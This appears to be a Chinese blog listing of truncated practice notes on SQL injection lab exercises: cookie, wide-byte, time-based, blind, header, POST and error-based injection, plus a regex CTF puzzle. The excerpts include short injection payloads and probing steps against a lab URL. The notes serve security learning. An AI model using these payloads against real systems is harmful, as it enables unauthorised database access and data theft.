心司+偏移注入
?ID=105'弹窗 参数错误说明不允许get注入尝试Cookie注入F12Console栏document.cookie="id=105"F5刷新正常回显,说明可以代替get传输iddocument.cookie="id=105"+escape(" and 1=1")正常显示document.cookie="id=10
心司+cookie注入
点击传送门,随意点击一个链接http://120.203.13.75:8001/shownews.asp?id=171测试是否有注入id=171'显示 传输非法字符尝试cookie注入浏览器http://120.203.13.75:8001/shownews.aspF12在Console栏目写下document.cookie="id=171"F5正常显示,说明存在Coo
心司+宽字节注入
6.3.1-SQL注入-宽字节注入Rank 1?id=1SELECT * FROM users WHERE id='1' LIMIT 0,1按照网页指示,正确回显?id=1' %23SELECT * FROM users WHERE id='1\' #' LIMIT 0,1根据sql语句的反馈,输入的id值,单引号被转义,整个id值当作字符串解析说明
心司+时效注入
6.4.1-SQL注入-延时注入Rank 1?id=1Your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1?id=2Your sql statement is SELECT * FROM users WHERE id='2' LIMIT 0,1根据回显,id的值被放入到s
心司+盲注
6.2.1-SQL注入-盲注Rank 1?id=1Your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1根据回显id=1' %23与上次注入内容的回显相同,说明注入成功id=1' order by 1 %23正确回显id=1' order by 5 %23错误回显最终通过改变
心司+Head注入+6.5.1-SQL注入+6.5.2-SQL注入+6.5.3-SQL注入
6.5.1-SQL注入-Header注入Rank 1$_SERVER["HTTP_USER_AGENT"] 获取浏览器的相关信息$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP',
心司+POST注入+6.6.1-SQL注入+6.6.2-SQL注入+6.6.3-SQL注入
6.6.1-SQL注入-Post注入Rank 1信息收集mysqlphpwindows server渗透过程输入zkz,显示SELECT username, password FROM users WHERE username='zkz' and password='zkz' LIMIT 1,1注入(联合查询,前后两个查询的字段数要一致)' and 1=2
心司+SQL注入-显错注入(1-4)题
6.1.1-SQL注入-显错注入Rank 1?id = 1SELECT * FROM users WHERE id='1' LIMIT 0,1?id = 1'SELECT * FROM users WHERE id='1'' LIMIT 0,1 报错说明存在注入下一步,猜解字段?id=1 order by 1SELECT * FROM users W
心司+正则表达式/靶场/正则匹配 - 彩蛋题+解题笔记
审计代码<?php $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"
心司+PHP+MYSQL登陆表单+解题笔记
phhmysql.html<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=devi